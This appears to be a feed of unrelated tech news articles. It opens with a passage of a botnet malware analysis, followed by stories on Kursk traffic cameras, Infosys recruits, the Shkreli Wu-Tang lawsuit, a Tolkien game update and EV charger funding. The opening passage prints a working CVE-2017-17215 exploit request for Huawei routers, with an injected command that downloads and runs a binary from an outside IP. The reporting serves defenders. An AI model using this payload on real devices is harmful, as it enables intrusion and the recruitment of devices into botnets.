Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

$(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.



Trying to outrun Ukrainian drones? Kursk traffic cams still issue speeding tickets.

SLOW DOWN —

Drones are everywhere. Traffic cameras don’t care.

Ukrainian FPV drone hunting Russian army assets along a road.

Imagine receiving a traffic ticket in the mail because you were speeding down a Russian road in Kursk with a Ukrainian attack drone on your tail. That’s the reality facing some Russians living near the front lines after Ukraine’s surprise seizure of Russian territory in Kursk Oblast. And they’re complaining about it on Telegram.

Rob Lee, a well-known analyst of the Ukraine/Russia war, comments on X that “traffic cameras are still operating in Kursk, and people are receiving speeding fines when trying to outrun FPVs [first-person-view attack drones]. Some have resorted to covering their license plates but the traffic police force them to remove them.”

The Russian outlet Mash offers more details from a local perspective:

Volunteers and military volunteers who arrived in the Kursk region are asking the traffic police not to fine them for speeding when they are escaping from the drones of the Ukrainian Armed Forces.

Several people who are near the combat zone told Mash about this. Cameras are still recording violations in the border area, and when people try to escape from the drones, they receive letters of happiness [tickets]. One of the well-known military activists was charged 9k [rubles, apparently—about US$100] in just one day. He accelerated on a highway that is attacked almost every hour by enemy FPV drones. Some cover their license plates, but the traffic police stop them and demand that they remove the stickers.

Mash claims that the traffic police are sympathetic and that given the drone situation, “speeding can be considered as committed in a state of extreme necessity.” But those who receive a speeding ticket will have to challenge it in court on these grounds.

An image from a Russian traffic camera. (Mash)

The attack drones at issue here are widely used even some distance beyond the current front lines. Russian milbloggers, for instance, have claimed for more than a week that Ukrainian drones are attacking supply vehicles on the important E38 highway through Kursk, and they have published photos of burning vehicles along the route. (The E38 is significantly to the north of known Ukrainian positions.)

So Russians are understandably in something of a hurry when on roads like this. But the traffic cameras don’t care—and neither, apparently, do the traffic police, who keep the cameras running.

Estonian X account “WarTranslated” provides English translations of Russian Telegram posts related to the Ukraine war, and the traffic cam issue has come up multiple times. According to one local Russian commentator, “In frontline areas, they continue to collect fines for violating traffic rules… For example, drivers exceed the speed limit in order to get away from the drone, or drive quickly through a dangerous place; the state regularly collects fines for this.”

Another Russian complains, “The fact is that in the Kursk region, surveillance cameras that monitor speeding continue to operate. There are frequent cases when fighters are fined when they run away from enemy FPV drones. Papering over license plates on cars does not help, either. For example, a guy from the People’s Militia of the city of Kurchatov was sent to 15 days of arrest because of a taped-over license plate.”

Fortunately, there’s an easy way to end the drone danger in Kursk.



“Exploitative” IT firm has been delaying 2,000 recruits’ onboarding for years

Jobs —

India’s Infosys recruits reportedly subjected to repeated, unpaid “pre-training.”


Indian IT firm Infosys has been accused of being “exploitative” after allegedly sending job offers to thousands of engineering graduates but still not onboarding any of them after as long as two years. The recent graduates have reportedly been told they must do repeated, unpaid training in order to remain eligible to work at Infosys.

Last week, the Nascent Information Technology Employees Senate (NITES), an Indian advocacy group for IT workers, sent a letter [PDF], shared by The Register, to Mansukh Mandaviya, India’s Minister of Labor and Employment. It requested that the Indian government intervene “to prevent exploitation of young IT graduates by Infosys.” The letter signed by NITES president Harpreet Singh Saluja claimed that NITES received “multiple” complaints from recent engineering graduates “who have been subjected to unprofessional and exploitative practices” from Infosys after being hired for system engineer and digital specialist engineer roles.

According to NITES, Infosys sent these people offer letters as early as April 22, 2022, after engaging in a college recruitment effort from 2022–2023 but never onboarded the graduates. NITES has previously said that “over 2,000 recruits” are affected.

Unpaid “pre-training”

NITES claims the people sent job offers were asked to participate in an unpaid, virtual “pre-training” that took place from July 1, 2024, until July 24, 2024. Infosys’ HR team reportedly told the recent graduates at that time that onboarding plans would be finalized by August 19 or September 2. But things didn’t go as anticipated, NITES’ letter claimed, leaving the would-be hires with “immense frustration, anxiety, and uncertainty.”

The letter reads:

Despite successfully completing the pre-training, the promised results were never communicated, leaving the graduates in limbo for over 20 days. To their shock, instead of receiving their joining dates, these graduates were informed that they needed to retake the pre-training exam offline, once again without any remuneration.

The Register reported today that Infosys recruits were subjected to “multiple unpaid virtual and in-person training sessions and assessments,” citing emails sent to recruits. It also said that recruits were told they would no longer be considered for onboarding if they didn’t attend these sessions, at least one of which is six weeks long, per The Register.

CEO claims recruits will work at Infosys eventually

Following NITES’ letter, Infosys CEO Salil Parekh claimed this week that the graduates would start their jobs but didn’t provide more details about when they would start or why there have been such lengthy delays and repeated training sessions. Speaking to Indian news site Press Trust of India, Parekh said:

Every offer that we have given, that offer will be someone who will join the company. We changed some dates, but beyond that everyone will join Infosys and there is no change in that approach.

Notably, in an earnings call last month [PDF], Infosys CFO Jayesh Sanghrajka said that Infosys is “looking at hiring 15,000 to 20,000” recent graduates this year, “depending on how we see the growth.” It’s unclear if that figure includes the 2,000 people who NITES is concerned about.

In March, Infosys reported having 317,240 employees, which represented its first decrease in employee count since 2001. Parekh also recently claimed Infosys isn’t expecting layoffs relating to emerging technologies like AI. In its most recent earnings report, Infosys reported a 5.1 percent year-over-year (YoY) increase in profit and a 2.1 percent YoY increase in revenues.

NITES has previously argued that because of the delays, Infosys should offer “full salary payments for the period during which onboarding has been delayed” or, if onboarding isn’t feasible, that Infosys help the recruited people find alternative jobs elsewhere within Infosys.

Infosys accused of hurting Indian economy

NITES’ letter argues that Infosys has already negatively impacted India’s economic growth, stating:

These young engineering graduates are integral to the future of our nation’s IT industry, which plays a pivotal role in our economy. By delaying their careers and subjecting them to unpaid work and repeated assessments, Infosys is not only wasting their valuable time but also undermining the contributions they could be making to India’s growth.

Infosys hasn’t explained why the onboarding of thousands of recruits has taken longer to begin than expected. One potential challenge is logistics. Infosys has also previously delayed onboarding in relation to the COVID-19 pandemic, which hit India particularly hard.

Additionally, India is dealing with a job shortage. Two years is a long time to wait to start a job, but many may have minimal options. A June 2024 study of Indian hiring trends [PDF] reported that IT job hiring in hardware and network declined 9 percent YoY, and hiring in software and software services declined 5 percent YoY. The Indian IT sector saw attrition rates drop from 27 percent in 2022 to 16 to 19 percent last year, per Indian magazine Frontline. This has contributed to there being fewer IT jobs available in the country, including entry-level positions. With people holding onto their jobs, there have also been reduced hiring efforts. Infosys, for example, didn’t do any campus hiring in 2023 or 2024, and neither did India-headquartered Tata Consultancy Services, Frontline noted.

Over the past two years, Infosys has maintained a pool of people to pull from at a time when an IT skills gap is expected in India in the coming years, coinciding with a lack of opportunities for recent IT graduates. However, the company risks losing the people it recruited, who may decide to look elsewhere. In the meantime, those recruits are left coping with financial and mental health strain while asking the government to intervene.



Turns out Martin Shkreli copied his $2M Wu-Tang album—and sent it to “50 different chicks”

STILL MAKING FRIENDS —

“Of course I made MP3 copies, they’re like hidden in safes all around the world.”

Martin Shkreli—he’s back, and he’s still got copies of that Wu-Tang Clan album.

The members of PleasrDAO are, well, pretty displeased with Martin Shkreli.

The decentralized autonomous organization spent $4.75 million to buy the fabled Wu-Tang Clan album Once Upon a Time in Shaolin, which had only been produced as a single copy. The album had once belonged to Shkreli, who purchased it directly from Wu-Tang Clan for $2 million in 2015. But after Shkreli became the “pharma bro” poster boy for price gouging in the drug sector, he ended up in severe legal trouble and served a seven-year prison sentence for securities fraud.

He also had to pay a $7.4 million penalty in that case, and the government seized and then sold Once Upon a Time in Shaolin to help pay the bill.

The album was truly “one of a kind,” a protest against the devaluation of music in the digital age and the kind of fascinating curio that instantly made its owners into “interesting people.” The album came as a two-CD set inside a nickel and silver box inscribed with the Wu-Tang logo, and the full package included a pair of customized audio speakers and a 174-page leather book featuring lyrics and “anecdotes on the production.”

In a complicated transaction, PleasrDAO purchased the album from an unnamed intermediary, who had first purchased it from the government. As part of that deal, PleasrDAO created a non-fungible token (NFT—remember those?) to show ownership of the album. The New York Times has a good description of what this entailed:

To tie “Once Upon a Time” to the digital realm, an NFT was created to stand as the ownership deed for the physical album, said Peter Scoolidge, a lawyer who specializes in cryptocurrency and NFT deals and was involved in the transaction. The 74 members of PleasrDAO… share collective ownership of the NFT deed, and thus own the album.

Makin’ copies…

But after purchasing the album and sharing the collective ownership of its NFT, PleasrDAO discovered that its “one of a kind” object wasn’t quite as exclusive as it had thought.

Shkreli had, in fact, made copies of the music. Lots of copies. On June 30, 2022, PleasrDAO said that Shkreli played music from the album on his YouTube channel and stated, “Of course I made MP3 copies, they’re like hidden in safes all around the world… I’m not stupid. I don’t buy something for two million dollars just so I can keep one copy.”

Shkreli began taunting PleasrDAO members about the album, telling one of them, “I literally play it on my discord all the time, you’re an idiot” and claiming that PleasrDAO was concerned about an album that “>5000 people have.” Shkreli claimed on a 2024 podcast that he had “burned the album and sent it to like, 50 different chicks”—and that this had been extremely good for his sex life.

Shkreli even offered to send copies of the album to random Internet commenters if they would just send him their “email addy.” He also told people to “look out for a torrent” and hosted listening parties for the album on his X account, which reached “potentially over 4,900 listeners.”

We know all of these details because PleasrDAO has sued Shkreli, claiming that he is acting in violation of the asset forfeiture order and that he is misappropriating “trade secrets” under New York law.

Shkreli “knew that by distributing copies of the Album’s data and files or by playing it publicly, his actions would decrease the Album’s marketability and value,” said PleasrDAO. They have asked a federal judge to stop Shkreli—and also to get them a list of everyone he has distributed the album to.

The Wu-Tang Clan album sits inside this box.

Not a secret

Shkreli’s response to all this is, in essence, “so what’s the problem?”

When he purchased the album for $2 million in 2015, he also acquired 50 percent of the copyrights to the package. Before the album was seized by the government, Shkreli says he took advantage of his copyright ownership to make copies as he was “permitted to do under his original purchase agreement.” The government, he says, seized only the individual, physical copy of the album, and Shkreli was within his rights to retain the copies he had already made.

As for trade secrets, well—a trade secret actually has to be “secret.” Thanks to his own actions, Shkreli has made sure that the album is not a secret. “Because Defendant legally purchased and shared the work before the Forfeiture Order and the Asset Purchase Agreement, the work is no longer a trade secret,” his lawyers wrote in his defense.

The Empire State strikes back

On August 26, 2024, a federal judge in Brooklyn issued a preliminary injunction (PDF) in the case as the two parties prepare to battle things out in court. The injunction prevents Shkreli from “possessing, using, disseminating, or selling any interest in the Wu-Tang Clan album ‘Once Upon a Time in Shaolin’ (the ‘Album’), including its data and files or the contents of the Album.”

Furthermore, Shkreli has to turn over “all of his copies, in any form, of the Album or its contents to defense counsel.” He also must file an affidavit swearing that he “no longer possesses any copies, in any form, of the Album or its contents.”

By the end of September 2024, Shkreli must further submit a list of “the names and contact information of the individuals to whom he distributed the data and files” and say whether he made any money for doing so.



Return to Moria arrives on Steam with mining, crafting, and a “Golden Update”

You know what they awoke in the darkness of Khazad-dûm —

Changes to combat, crafting, and ambient music came from player feedback.

It’s hard work, survival crafting, but there are moments for song, dance, and tankards.

North Beach Games

The dwarves of J.R.R. Tolkien’s writing are, according to the author himself, “a tough, thrawn race for the most part, secretive, retentive of the memory of injuries (and of benefits),” and “lovers… of things that take shape under the hands of the craftsmen rather than things that live by their own life.”

Is it secrecy and avarice that explain why The Lord of the Rings: Return to Moria spent its first year of existence as an Epic Games Store exclusive? None can say for certain. But the survival crafting game has today arrived on Steam and Xbox, joining its PlayStation and EGS releases and bringing a 1.3 “Golden Update” to all platforms. Steam Deck compatibility is on its way to Verified, with a number of handheld niceties already in place.

The Golden Update grants new and existing players a procedurally generated sandbox mode to complement the game’s (also generated) campaign, new weapons and armor, crossplay between all platforms with up to eight players, specific sliders for difficulty settings, and… a pause function in offline single-player, which seemingly was not there before.

Launch trailer for Return to Moria on Steam and consoles (and its Golden Update).

What are you actually doing in Return to Moria? You, a dwarf in the Fourth Age of Middle-earth, are tasked by Gimli Lockbearer with heading into Moria (i.e. Khazad-dûm) to recover its treasures. Except every Moria is different, each generated from a random seed. You mine for materials, use materials to make gear and goods, set up base camps with stations and fixtures, and, of course, fight the things you awaken in the depths.
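Seeded procedural generation of this kind can be illustrated with a toy sketch. This is not the game's actual algorithm, just a demonstration of the principle that the same seed always reproduces the same layout:

```python
import random

def generate_moria(seed: int, rooms: int = 5) -> list[str]:
    """Derive a deterministic mine layout from a seed (illustrative only)."""
    rng = random.Random(seed)  # isolated RNG: same seed, same sequence
    kinds = ["hall", "forge", "mineshaft", "bridge", "tomb"]
    return [rng.choice(kinds) for _ in range(rooms)]

# Reproducibility: two players sharing a seed get the same Moria.
assert generate_moria(42) == generate_moria(42)
```

Sharing the seed, rather than the whole generated world, is what lets each campaign be unique yet reproducible.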

  • The campaign is procedurally generated, but it tells a narrative with a beginning, middle, and end. And runes—lots of runes.

  • Dwarves? Underground? Making stuff? Yes, of course.

  • There will be goblins.

Not only does a release on new cross-compatible platforms give you a chance to check out a potentially overlooked gem, but this is also version 1.3 of the game. Reviews of the game at release in October 2023 were closely aligned around one point: it needed more time to cook.

PC Gamer found the game authentic to Tolkien’s lore, intriguing in its depictions of underground spaces, and alternately goofy and harrowing in building and fighting. But bugs, stuttering, clipping errors, and disbelief-shattering oddities brought the experience down a good deal. Polygon was more critical of the game’s tile-based layouts and laborious backtracking. “A few patches could see this become a survival game that can hold its own against the more popular entries in the genre,” wrote Ford James.

In a “Quality of Life Showcase,” Game Director Jon-Paul Dumont details how the game has advanced over the past 10 months. The map is color-coded and easier to read, ambient music and transitions are improved, combat has been improved to feel better and more grounded (another point of contention in reviews), and player gripes about inventory management, cooking, building, and crafting have been addressed.

I haven’t played enough of the game to render any kind of verdict, but I’m always glad to see a team actively improving its game after launch—digging in, if you will.



Feds award $521 million in EV charger funds, but rollout remains slow

got the plug? —

The awards are part of a $7.5 billion program for EV charger infrastructure.

Getty Images

The federal government awarded another $521 million in EV charger funding today. It’s the latest tranche of money from a $7.5 billion program authorized by the 2021 Bipartisan Infrastructure Law, which aims to build out fast chargers along interstate highways as well as bring charging infrastructure to underserved communities.

Of today’s announcement, $321 million will fund 41 different projects across the country, a mix of level 2 AC chargers and DC fast chargers. The remaining $200 million will continue funding DC fast chargers along designated highway corridors.

The Joint Office of Energy and Transportation, which administers the federal funding, called out a $15 million project to install chargers at 53 sites in Milwaukee and a $3.9 million project to install publicly accessible chargers on the Sioux Reservation in North Dakota as examples of the latest awards.

“Today’s investments in public community charging fill crucial gaps and provide the foundation for a zero-emission future where everyone can choose to ride or drive electric for greater individual convenience and reduced fueling costs, as well as cleaner air and lower healthcare costs for all Americans,” said Gabe Klein, executive director of the Joint Office of Energy and Transportation.

The Biden administration set a goal of 500,000 EV chargers nationwide by 2030. The Joint Office’s latest data shows more than 189,000 chargers across the country, although fewer than 44,000 of those are DC fast chargers.

But it cites real improvements over the past few years: 56 percent of the most heavily trafficked highways have a fast charger every 50 miles, up from 38 percent in January 2021. And in June alone, it says, an additional 3,000 charging ports were added to the national network. Other funding has gone to repairing or upgrading existing infrastructure, starting with a currently inoperable site in Washington, DC.
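The “fast charger every 50 miles” metric amounts to checking that no stretch of a corridor is farther than 50 miles from the previous charging site. A rough sketch of that check (a hypothetical helper, not the Joint Office’s actual methodology):

```python
def corridor_covered(charger_miles: list[float],
                     corridor_length: float,
                     max_gap: float = 50.0) -> bool:
    """Return True if no gap between consecutive chargers (or the
    corridor's endpoints) exceeds max_gap miles."""
    prev = 0.0
    for marker in sorted(charger_miles) + [corridor_length]:
        if marker - prev > max_gap:
            return False  # a driver could run dry in this stretch
        prev = marker
    return True

print(corridor_covered([30, 75, 120], 150))  # True: every gap is 50 miles or less
print(corridor_covered([60, 130], 150))      # False: the first gap is 60 miles
```

Raising the national coverage figure from 38 to 56 percent means closing exactly these kinds of gaps, corridor by corridor.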

At the same time, progress has not been especially rapid for the highway charger NEVI (National Electric Vehicle Infrastructure) program. NEVI funds are administered by the states, similar to the way they manage federal highway funding, and the extra layers of bureaucracy have meant that the first NEVI-funded charging station—located in Ohio—only became operational in mid-December 2023.
